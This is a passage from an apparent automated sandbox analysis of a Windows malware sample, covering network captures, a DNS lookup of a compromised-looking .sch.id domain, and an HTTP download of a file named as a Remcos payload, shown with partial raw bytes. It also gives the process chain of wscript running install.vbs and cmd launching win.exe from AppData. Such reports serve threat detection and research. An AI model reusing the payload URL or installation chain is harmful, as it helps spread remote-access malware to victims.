Feb 23, 2021 09:20:26.264827013 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264843941 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264858007 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264892101 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264942884 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264992952 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.265019894 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.265058994 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.265103102 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.265125036 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.265175104 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502198935 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502230883 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502252102 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502274990 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502296925 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502316952 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502340078 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502361059 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502367020 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502388000 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502430916 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502464056 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502506971 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502528906 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502552032 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502573967 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502598047 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502619028 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502643108 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502664089 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502686977 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502727032 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502731085 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502742052 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502743959 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502747059 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502748966 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502753019 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502777100 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502778053 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502800941 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502815962 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502825022 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502854109 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502862930 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502882004 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.502904892 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502948046 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.502990007 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.503022909 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.503046989 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.503046989 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.503066063 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.503087044 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.503117085 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:29.932291985 CET	49744	80	192.168.2.5	103.150.60.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:16:35.875375032 CET	54302	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:35.920758009 CET	53784	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:35.924000978 CET	53	54302	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:35.970035076 CET	53	53784	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:36.036746025 CET	65307	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:36.056230068 CET	64344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:36.088133097 CET	53	65307	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:36.104971886 CET	53	64344	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:36.110393047 CET	62060	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:36.140278101 CET	61805	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:36.158941984 CET	53	62060	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:36.188792944 CET	53	61805	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:37.256527901 CET	54795	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:37.313708067 CET	53	54795	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:38.418143034 CET	49557	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:38.469527960 CET	53	49557	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:39.499136925 CET	61733	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:39.549823046 CET	53	61733	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:40.508593082 CET	65447	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:40.570327044 CET	53	65447	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:41.166428089 CET	52441	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:41.216890097 CET	53	52441	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:42.329469919 CET	62176	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:42.381705999 CET	53	62176	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:43.563045025 CET	59596	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:43.614485979 CET	53	59596	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:45.872351885 CET	65296	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:45.923912048 CET	53	65296	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:47.141741991 CET	63183	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:47.190421104 CET	53	63183	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:48.148422956 CET	60151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:48.199995995 CET	53	60151	8.8.8.8	192.168.2.5
Feb 23, 2021 09:16:49.148196936 CET	56969	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:16:49.199858904 CET	53	56969	8.8.8.8	192.168.2.5
Feb 23, 2021 09:17:00.655234098 CET	55161	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:17:00.717153072 CET	53	55161	8.8.8.8	192.168.2.5
Feb 23, 2021 09:17:31.297343016 CET	54757	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:17:31.358980894 CET	53	54757	8.8.8.8	192.168.2.5
Feb 23, 2021 09:17:31.649241924 CET	49992	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:17:31.706415892 CET	53	49992	8.8.8.8	192.168.2.5
Feb 23, 2021 09:17:40.235011101 CET	60075	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:17:40.284209013 CET	53	60075	8.8.8.8	192.168.2.5
Feb 23, 2021 09:17:58.219697952 CET	55016	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:17:58.278436899 CET	53	55016	8.8.8.8	192.168.2.5
Feb 23, 2021 09:18:42.023427010 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:18:42.072043896 CET	53	64345	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:08.678245068 CET	57128	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:08.743278980 CET	53	57128	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:24.523102045 CET	54791	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:24.592647076 CET	53	54791	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:25.511943102 CET	50463	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:25.571974993 CET	53	50463	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:27.038763046 CET	50394	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:27.096163988 CET	53	50394	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:27.591542959 CET	58530	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:27.677416086 CET	53	58530	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:28.470954895 CET	53813	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:28.528254032 CET	53	53813	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:29.725474119 CET	63732	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:29.782422066 CET	53	63732	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:30.400315046 CET	57344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:30.457479954 CET	53	57344	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:31.863471985 CET	54450	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:31.924844027 CET	53	54450	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:33.234102011 CET	59261	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:33.291179895 CET	53	59261	8.8.8.8	192.168.2.5
Feb 23, 2021 09:19:33.741686106 CET	57151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:19:33.798862934 CET	53	57151	8.8.8.8	192.168.2.5
Feb 23, 2021 09:20:24.687385082 CET	59413	53	192.168.2.5	8.8.8.8
Feb 23, 2021 09:20:25.205091000 CET	53	59413	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 09:20:24.687385082 CET	192.168.2.5	8.8.8.8	0xf2e7	Standard query (0)	mtspsmjeli.sch.id	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 09:20:25.205091000 CET	8.8.8.8	192.168.2.5	0xf2e7	No error (0)	mtspsmjeli.sch.id		103.150.60.242	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mtspsmjeli.sch.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49744	103.150.60.242	80	C:\Users\user\Desktop\4AtUJN8Hdu.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:20:25.547291040 CET	6237	OUT	GET /cl/VK_Remcos%20v2_AxaGIU151.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mtspsmjeli.sch.id Cache-Control: no-cache
Feb 23, 2021 09:20:25.785808086 CET	6239	IN	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: application/octet-stream Last-Modified: Wed, 17 Feb 2021 16:04:35 GMT Accept-Ranges: bytes Content-Length: 131136 Date: Tue, 23 Feb 2021 08:20:25 GMT Server: LiteSpeed Data Raw: 64 d7 40 69 ff 19 bf 28 91 ce 51 49 02 29 5a 12 ff 43 b3 98 75 f9 fd 76 62 a0 10 9f 5c e8 8b 6b 67 c6 6a c8 82 e6 ab 32 24 3a d5 f6 f8 1c 82 bd 0a 8d c4 87 02 83 91 55 9d 26 9f 45 68 2f 42 00 1c db 4b 34 86 e7 3b 21 ae b1 0d ac 65 18 88 d0 61 52 e9 54 5f f7 51 1e c6 80 1e 14 99 7b 7c e0 8f 1b ca f1 45 29 a1 f2 0f 5b 4e 55 0d 64 2d 72 79 9f f6 3e d7 fc ff e6 0b a6 6e e1 3c 79 28 a2 6d 2b 87 8c 82 f3 86 0e 74 46 16 b0 53 a7 8e d7 f2 68 f3 c2 e6 8d 95 61 ff 8f cf bf 4c 05 b8 85 c0 02 8d ef 8c 99 4a 18 de 7a 66 f7 90 b2 b9 e9 29 10 c3 7e 1c fd a6 20 c7 ab bd b9 e8 12 0d 16 67 45 d9 27 0a 9a d6 aa a1 f5 92 27 58 3f d9 a7 79 0d a6 e0 91 c4 3f bd 8e 9f c9 80 12 f9 26 3c 27 fa 2f fb 47 b2 9f cd e2 d5 dc ec aa 66 6f ee 8a 5c 02 ce 53 3b 3f ec 92 c3 9c 01 82 56 92 3a 34 7b 8b c1 9e 0e d0 6f c1 0a cc a6 2a 14 c3 f4 94 87 c0 c7 4e 71 12 e3 18 5b c2 e7 31 d3 d9 f4 80 ee 52 9d 2c 3c f1 73 34 96 b1 fd 03 c8 12 ed cf ba ec e7 6a 9f c2 89 7b f3 4e 1b 24 75 c6 80 98 2b 24 05 ba e4 64 be 8b 60 0a d7 35 74 1e 52 2d 1f 34 38 0d e2 ed f6 55 5a 94 10 a2 57 fa 6b 54 b2 f2 b1 9f d2 bf 56 e6 95 1f 35 e3 11 1b 94 b0 4f 6f 81 e6 15 04 69 56 dd 7c 07 02 30 66 42 3f 17 95 f9 0a 09 6a db 30 18 0b 19 c8 45 39 54 c0 28 d1 e9 0f ba 94 06 59 28 c0 41 02 6a a9 39 93 b9 0c 6d bd 20 a3 c1 7a b5 e4 96 1f 9e 60 1a 72 ef c8 11 e4 95 28 75 4f f3 78 52 e0 e5 2f 27 c7 59 2f ef 44 07 90 bc e5 9e ad 0b 5d 93 5c 92 f8 ac b0 28 5e 88 4b 73 0c f0 4c d9 82 0b f5 98 8b cf 28 45 fd 3e 71 1a 82 d5 19 8e f5 1d 81 1f f2 44 c1 69 ec 2b 2a 24 7e 02 54 f2 68 41 fa 57 be e2 01 1c b1 6e 98 e6 4f 19 3c 52 f5 a1 c0 c4 3d 0e 18 78 a7 9c b9 54 cd 51 99 3d 23 25 ef 87 09 1c e5 7d 6f 84 94 13 98 e5 8d 27 e0 b2 60 72 57 db b2 f6 65 df 53 99 24 c8 e6 42 11 d4 c6 66 2c f8 11 8b 07 be 29 ba 9c 59 41 8d fe a3 9e a9 af e1 99 22 c6 8b e2 9c 36 c5 26 f1 df 18 87 91 9c c6 52 29 02 cd 63 12 25 36 45 2d 13 58 65 2b 67 86 35 4d c1 19 dd a6 3f 81 31 8e 58 b3 7b 3c ff 52 7d 21 87 74 92 aa 78 5f 39 b4 02 21 5c 6b 74 dd 11 12 7c d7 b7 61 73 11 10 2d c7 9a 54 66 70 e5 b8 96 8e bf c0 cd 35 ae dc fa 4f 0d 44 ca d5 38 3a 39 b5 44 9a 3e a8 b9 4d c9 91 40 82 1c 2e ea af 4e c4 1d b8 25 f8 76 ed d6 c0 88 5d e5 36 99 cb 95 68 b6 38 17 ed f6 f2 db 91 18 9b 84 be 23 20 14 8a a3 a7 ee f6 46 6c 6d 92 5b ed af ab 73 c7 a0 b4 c6 1e 46 ee 48 90 7d c6 5a d8 a7 06 c8 39 a3 97 ec a0 75 42 65 46 7e bf cf 3d cd 47 22 47 6f e2 62 83 50 a3 48 71 d6 c5 64 48 6e 11 36 bc e1 08 62 a4 c3 c3 96 f3 30 91 ec 2f 02 f1 81 2c 34 0b fd f0 d6 96 2b a6 50 4d a8 18 60 5f c2 51 dc 04 7e 47 12 86 aa 32 f1 f5 a4 a8 48 74 4d e3 9d 4c 7e 29 87 08 3c 65 01 02 66 9e a6 31 64 2c 78 31 e6 82 44 a5 5e 74 8c c0 3a a4 ae 0a 9f 13 c0 1a 72 31 00 5a 2c d6 19 15 fa cf b0 49 f1 99 c3 8e 34 f8 38 a1 e6 dd 3e 61 51 81 db 34 85 e7 3b 21 aa b1 0d ac 9a e7 88 d0 d9 52 e9 54 5f f7 51 1e 86 80 1e 14 99 7b 7c e0 8f 1b ca f1 45 29 a1 f2 0f 5b 4e 55 0d 64 2d 72 79 9f f6 3e d7 fc ff e6 0b a6 6e e1 c4 79 28 a2 63 34 3d 82 82 47 8f c3 55 fe 17 fc 9e 86 da bf 9b 1b d3 b2 94 e2 f2 13 9e e2 ef dc 2d 6b d6 ea b4 22 ef 8a ac eb 3f 76 fe 13 08 d7 d4 fd ea c9 44 7f a7 1b 32 f0 ab 2a e3 ab bd b9 e8 12 0d 16 03 39 5e 9e 2a 87 3f 40 81 e8 7b cd 78 22 30 4d 14 33 52 0a b0 d9 d6 57 fd a1 39 6a 30 e4 cf d6 07 e7 c6 11 68 af 76 27 b9 d4 39 06 8b 7b 86 04 29 5d e5 24 77 26 d6 06 5a c1 7f eb a9 4b 7b d0 fc 79 66 2b ba 13 Data Ascii: d@i(QI)ZCuvb\kgj2$:U&Eh/BK4;!eaRT_Q{\|E)[NUd-ry>n<y(m+tFShaLJzf)~ gE''X?y?&<'/Gfo\S;?V:4{oNq[1R,<s4j{N$u+$d`5tR-48UZWkTV5OoiV\|0fB?j0E9T(Y(Aj9m z`r(uOxR/'Y/D]\(^KsL(E>qDi+$~ThAWnO<R=xTQ=#%}o'`rWeS$Bf,)YA"6&R)c%6E-Xe+g5M?1X{<R}!tx_9!\kt\|as-Tfp5OD8:9D>M@.N%v]6h8# Flm[sFH}Z9uBeF~=G"GobPHqdHn6b0/,4+PM`_Q~G2HtML~)<ef1d,x1D^t:r1Z,I48>aQ4;!RT_Q{\|E)[NUd-ry>ny(c4=GU-k"?vD29^?@{x"0M3RW9j0hv'9{)]$w&ZK{yf+
Feb 23, 2021 09:20:25.785835981 CET	6240	IN	Data Raw: 39 85 83 08 36 4c 05 09 2a 1e b4 9a 28 2d 21 6d fb 09 80 40 2d 0d 10 ce 30 1e 48 ec b0 77 12 21 18 99 66 ff d2 95 23 d5 fb 07 cf ba ec e7 6a 9f c2 89 2b b6 4e 1b 68 74 c3 80 bd 54 b0 5a ba e4 64 be 8b 60 0a d7 d5 74 10 53 26 1e 32 38 0d a2 ec f6 Data Ascii: 96L(-!m@-0Hw!f#j+NhtTZd`tS&28UWkV5[_oiR\|0fB;j0U9T(Y(Az9m0z`r(ugyR/'.]\(^KsM/(E>qDi+$~
Feb 23, 2021 09:20:25.785864115 CET	6242	IN	Data Raw: a0 f4 c6 1e 04 ee 48 90 7d c6 5a d8 a7 06 c8 39 a3 97 ec a0 75 42 65 46 7e bf cf 3d cd 47 22 47 6f e2 62 83 50 a3 48 71 d6 c5 64 48 6e 11 36 bc e1 08 62 a4 c3 c3 96 f3 30 91 ec 2f 02 f1 81 2c 34 0b fd f0 d6 96 2b a6 50 4d a8 18 60 5f c2 51 dc 04 Data Ascii: H}Z9uBeF~=G"GobPHqdHn6b0/,4+PM`_Q~G2HtML~)<ef1d,x1D^t:r1Z,I48>aQ4;!RT_Q{\|E)[NUd-ry>ny(c4=GU
Feb 23, 2021 09:20:25.785896063 CET	6243	IN	Data Raw: e9 0d ba 94 06 59 28 d0 41 02 7a a9 39 93 b9 1c 6d bd 30 a3 c1 7a b5 e4 96 0f 9e 60 1a 72 ef c8 11 e4 95 28 75 67 82 79 52 f8 e4 2f 27 c7 89 2e ef a4 0c 90 bc e5 9e ad 0b 5d 93 5c 92 f8 ac b0 28 5e 88 4b 73 0c 10 4d d9 ae 2f f5 98 8b cf 28 45 fd Data Ascii: Y(Az9m0z`r(ugyR/'.]\(^KsM/(E>qDi+*$~ThAWnO<R=^x7TQ=#%}o'`rySbBf,)YA"ByvR)b%VE-d+g5M?1{\|6Ut
Feb 23, 2021 09:20:25.785933971 CET	6244	IN	Data Raw: ca 1d 81 cc 39 39 e2 8a e0 e6 d2 89 64 77 33 9a 34 8a 48 fa aa 7a e2 02 03 8f fb 3a 91 d9 04 be 95 b5 f4 d8 4b 76 ea 16 8d c7 48 83 17 71 4c a2 71 45 29 a1 98 0d 0c 19 3d 0d 64 2d 32 86 ea fe f9 92 08 fe e6 0b a6 a9 a4 3c 69 28 a2 63 bd 78 6e 09 Data Ascii: 99dw34Hz:KvHqLqE)=d-2<i(cxnHS_W;BUKWlv4:LbBOF1*(2uECc8}Wy7'+sTNsvL:d{aoB(~vL}g,
Feb 23, 2021 09:20:25.785979986 CET	6246	IN	Data Raw: 54 de ed 7d 3a 0f 78 ec ed ed 65 62 e0 b2 60 2b 24 6d d3 8e 44 54 bf 12 27 f2 62 82 6c c6 f5 a6 ed 58 14 db ef ce 0c bb 9c 00 1c 4e ab 28 72 56 da e9 f3 32 0e 98 e2 fc 18 ee c7 50 f2 0d 8c 6e 03 99 d9 e1 fd 88 5e 41 64 56 18 ee 46 83 88 a0 22 8a Data Ascii: T}:xeb`+$mDT'blXN(rV2Pn^AdVF"h1-r[{\|km!,Q]1f{1^)VtL\;~,gDsu{9]>j%hNeJ7?]<-P}As?,.}jX:Sq6>=
Feb 23, 2021 09:20:25.786014080 CET	6247	IN	Data Raw: b1 78 5e 76 dc d6 3f 40 e9 d0 2d 8c 78 74 93 bd a6 72 52 e2 56 88 d6 57 95 8d 6f 2b 30 b2 6c 22 b5 a6 c6 f9 be fe 76 27 3a 10 29 a5 73 c9 c7 04 a2 91 23 21 9f 94 97 06 5b a9 ef 59 e8 4b 84 c5 c0 2a 27 2b d0 08 b2 c8 8b e0 09 4e 05 09 a7 53 44 72 Data Ascii: x^v?@-xtrRVWo+0l"v':)s#![YK*'+NSDrzvD`8EC0ObZrYU?\mEJM?p>1LZ9%X1k>V^UiP/.;+N.2::P[kEi1pXz-HjEHt?==Lr9L)eZlJh
Feb 23, 2021 09:20:25.786050081 CET	6249	IN	Data Raw: cd 15 8b 35 60 69 6f 3c d2 b3 c1 dd a5 1e 9a 6e 95 4f 4d 6f ea c5 b1 3b 6b 90 da ed be bc 97 80 77 2b 8d e7 fe 4a a8 46 d5 99 eb 53 91 f2 50 dc f0 65 b4 33 56 88 43 da 8c b3 ea a5 07 6c e6 df 53 bd 50 be 4b 94 e1 f4 4b 53 ac 11 5d d8 2e 87 5a 53 Data Ascii: 5`io<nOMo;kw+JFSPe3VClSPKKS].ZS7,GU12oOc_T#[#:zACMWQ_r/C#nt6tXn>S\j^Lf'I0XGH9;ru4^9l Q+kKe5/
Feb 23, 2021 09:20:25.786082983 CET	6250	IN	Data Raw: 4c a7 12 26 4e cd 2d 41 f1 ad f6 9c 29 fc d2 8a 17 fa 83 42 98 f2 b1 c6 01 06 6e 51 84 1e ca c6 59 08 d5 b0 0a e4 6d b5 53 89 2c 5a 8a 2c be 3a 87 27 42 c4 02 ad aa 4b 09 d1 93 87 49 09 92 03 bd 73 a3 3f d7 52 05 1d 04 b4 b5 18 28 5b bd 89 b1 0c Data Ascii: L&N-A)BnQYmS,Z,:'BKIs?R([6J\AG%S7}ln/Mb?lHa[`[CG:}t9F>af"kJh!T]tOkM^`gfhTM}Lf9PfRw{
Feb 23, 2021 09:20:25.786125898 CET	6251	IN	Data Raw: 59 45 ad fb 59 60 dc 06 5d 59 c4 0b 04 9f c3 55 bf bc 3d f4 ff b7 61 55 b0 dc 4c fd c5 97 85 79 9b 8a ce 36 15 e3 d9 4f 69 8c 61 6b c7 8c 5a 2b 80 dc 3f 2f 74 fc 4b 9f 79 a2 91 b9 d9 9e a8 d3 29 90 50 0a 42 fd 81 1a a2 f1 55 dd ca 39 a1 e6 50 7b Data Ascii: YEY`]YU=aULy6OiakZ+?/tKy)PBU9P{cd.9/v%%hHDfnIH?`vyqICtH@U._DzS8U><(d@~snHUM:BO/]
Feb 23, 2021 09:20:26.024648905 CET	6253	IN	Data Raw: f5 98 ae c6 2b 75 74 30 7d ce 11 bf 9d 92 80 d5 19 dd a3 90 04 67 0f bb 3e 3e bc a6 67 2c 81 17 78 a1 29 41 aa a8 ab 76 50 5d b1 ed 60 19 c6 5c c4 27 d7 22 2c d4 b0 13 11 f3 f3 c8 e9 bc 3b a5 99 3d 7a 7c 85 d3 b0 8c 5d 3c 6f 6c c1 fe 67 1a 64 d4 Data Ascii: +ut0}g>>g,x)AvP]`\'",;=z\|]<olgd`<PZ.B9QW#asFVc_1S%Cd+>~oL+e5K*t@\r22_f`k1@n$P^0v\-6n;M5`&`X

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 4AtUJN8Hdu.exe PID: 6356 Parent PID: 5612

General

Start time:	09:16:42
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\4AtUJN8Hdu.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\4AtUJN8Hdu.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	D7E81ABCE9332847471B89E50B241172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: 4AtUJN8Hdu.exe PID: 6564 Parent PID: 6356

General

Start time:	09:20:16
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\4AtUJN8Hdu.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\4AtUJN8Hdu.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	D7E81ABCE9332847471B89E50B241172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 984 Parent PID: 6564

General

Start time:	09:20:27
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Imagebase:	0x8b0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5476 Parent PID: 984

General

Start time:	09:20:30
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x210000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6348 Parent PID: 5476

General

Start time:	09:20:30
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: win.exe PID: 6748 Parent PID: 5476

General

Start time:	09:20:30
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\win.exe
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	D7E81ABCE9332847471B89E50B241172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, Virustotal, Browse Detection: 43%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 6904 Parent PID: 3472

General

Start time:	09:20:37
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	D7E81ABCE9332847471B89E50B241172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 7148 Parent PID: 3472

General

Start time:	09:20:45
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	D7E81ABCE9332847471B89E50B241172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 4AtUJN8Hdu.exe PID: 6356 Parent PID: 5612 4AtUJN8Hdu.exeCOMMON

Executed Functions

Function 00412790, Relevance: 118.0, APIs: 60, Strings: 7, Instructions: 780COMMON

